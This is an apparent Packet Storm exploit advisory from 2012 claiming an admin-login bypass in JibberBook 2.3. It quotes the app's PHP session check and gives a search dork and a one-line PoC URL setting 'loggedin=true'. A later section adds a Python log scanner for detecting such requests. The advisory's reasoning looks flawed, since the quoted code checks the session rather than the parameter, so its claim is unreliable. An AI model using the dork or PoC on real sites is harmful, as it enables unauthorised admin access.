Jibberbook 2.3 Administrative Bypass

Posted May 7, 2012
Authored by L3b-r1'z

Jibberbook version 2.3 suffers from an administrative bypass vulnerability.

tags | exploit, bypass
SHA-256 | b5b53e60f590f445c7ae12ebaa132d6dde7e0ddd3bbcac6745422c617c736ba3

#################################################
# Exploit Title : JibberBook Admin Bypass Vulnerability
#
# Author : IrIsT.Ir & Sec4Ever.com
#
# Discovered By : L3b-r1'z
#
# Home : http://IrIsT.Ir & http://Sec4Ever.com
#
# P Blob : http://L3b-r1z.com/
#
# Software Link : http://jibberbook.com/
#
# Security Risk : High
#
# Version : 2.3
#
# Tested on : win\XP
#
# Dork : allintext: "JibberBook created by chromasynthetic | Powered by MooTools, HTML Purifier, and Akismet"
#
# 1) Script
# 2) Info Vulnerability
# 3) P0c
#
#
#################################################
#
# 1) Script:
# JibberBook lets visitors leave a comment, for example to say how much they
# like the website :)
# or to send any message to the site admin.
#
#
#################################################
#
# 2) Info Vulnerability :
# This exploit allows an attacker to log into the admin panel without entering
# a username or password.
# Look into the file index.php in jibberbook-2.3\admin :
#
# require_once('inc/secure.php');
# require_once('../inc/includes.php');
# includes(array('admin/actions/load.php', 'admin/actions/transformxml.php'));
#
# $_SESSION['referer'] = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
# require_once('inc/header.php');
# ?>
# index.php requires a file named secure.php, so let's check it :) :
#
# session_start();
# if (!isset($_SESSION['admin']))
# {
#     if (is_file(realpath('login_form.php'))) {
#         $url = 'http://' . $_SERVER['HTTP_HOST'] . dirname($_SERVER['REQUEST_URI'] . 'x') . '/login_form.php';
#     } else {
#         $url = 'http://' . $_SERVER['HTTP_HOST'] . dirname(dirname($_SERVER['REQUEST_URI'] . 'x')) . '/login_form.php';
#     }
#     header("Location: $url");
#     exit();
# } else {
#     $loggedin = true;
# }
#
# There is no real security in this file :P.
# Look at the code above: the else branch just sets $loggedin = true. That means
# a visitor who is not admin is sent to login_form.php, and otherwise
# $loggedin = true and the admin is redirected to the admin panel :).
#
#
#################################################
#
# 3) p0c :
#
# Site.Com/Admin/Login_form.php?loggedin=true
#
#################################################
#
#
# Special Thx To : Irist Team & Sec4Ever Team .
#
#################################################
#
#
# Greet'z : b0x, Virus-Ra3ch, Damane2011, Hacker-1420, The Injector, N4ss1m, hacker-1420,
# Sec4ever, B07 M4S73R, Stalk3r, Hacker-Dz, Mr.XKILLeR, The Viper, Th3 Killer Dz,
# Over-X <3, And All My Friends.
#
#################################################

--
Proud To Be Lebanese :D

I Will Miss You My Friends : b0x, Virus-Ra3ch, Damane2011, Hacker-1420, The Injector, N4ss1m, Sec4ever, B07 M4S73R, Stalk3r, Hacker-Dz, Mr.XKILLeR, The Viper, Th3 Killer Dz, Over-X <3, And All My Friends.

Sec4ever.com.
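Added here as a defender's example (not part of the advisory or of JibberBook itself): a Python check that scans web-server access logs for requests into the admin directory that carry the `loggedin` query parameter used in the PoC above. The log lines are constructed; the combined-format regex and the `/admin/` prefix are assumptions about the deployment.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache/nginx "combined" format; not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [07/May/2012:10:01:12 +0000] "GET /Admin/Login_form.php?loggedin=true HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [07/May/2012:10:01:15 +0000] "GET /admin/index.php HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
198.51.100.4 - - [07/May/2012:10:02:00 +0000] "GET /index.php?loggedin=true HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
198.51.100.4 - - [07/May/2012:10:02:30 +0000] "POST /admin/login_form.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [07/May/2012:10:03:00 +0000] "GET /admin/login_form.php?loggedin= HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Assumed combined log format: client, ident, user, [timestamp], "METHOD target proto", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The query parameter the advisory's PoC appends to the admin login page.
TRUST_PARAMS = {"loggedin"}


def is_admin_path(path):
    # Compare case-insensitively: the PoC uses /Admin/Login_form.php and the
    # advisory says it was tested on Windows, where the path is not case-sensitive.
    return path.lower().startswith("/admin/")


def find_bypass_attempts(log_text):
    """Return one finding per admin-area request that carries a trust-flag parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m["target"])
        if not is_admin_path(unquote(parts.path)):
            continue
        # keep_blank_values so "?loggedin=" (empty value) is still reported
        params = set(parse_qs(parts.query, keep_blank_values=True))
        injected = sorted(params & TRUST_PARAMS)
        if injected:
            hits.append({"ip": m["ip"], "ts": m["ts"], "path": parts.path,
                         "params": injected, "status": int(m["status"])})
    return hits


if __name__ == "__main__":
    for hit in find_bypass_attempts(SAMPLE_LOG):
        print(hit)
```

A 200 response on such a request is the signal worth alerting on; a 302 back to the login form means the session gate in secure.php did its job.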
© 2022 Packet Storm. All rights reserved.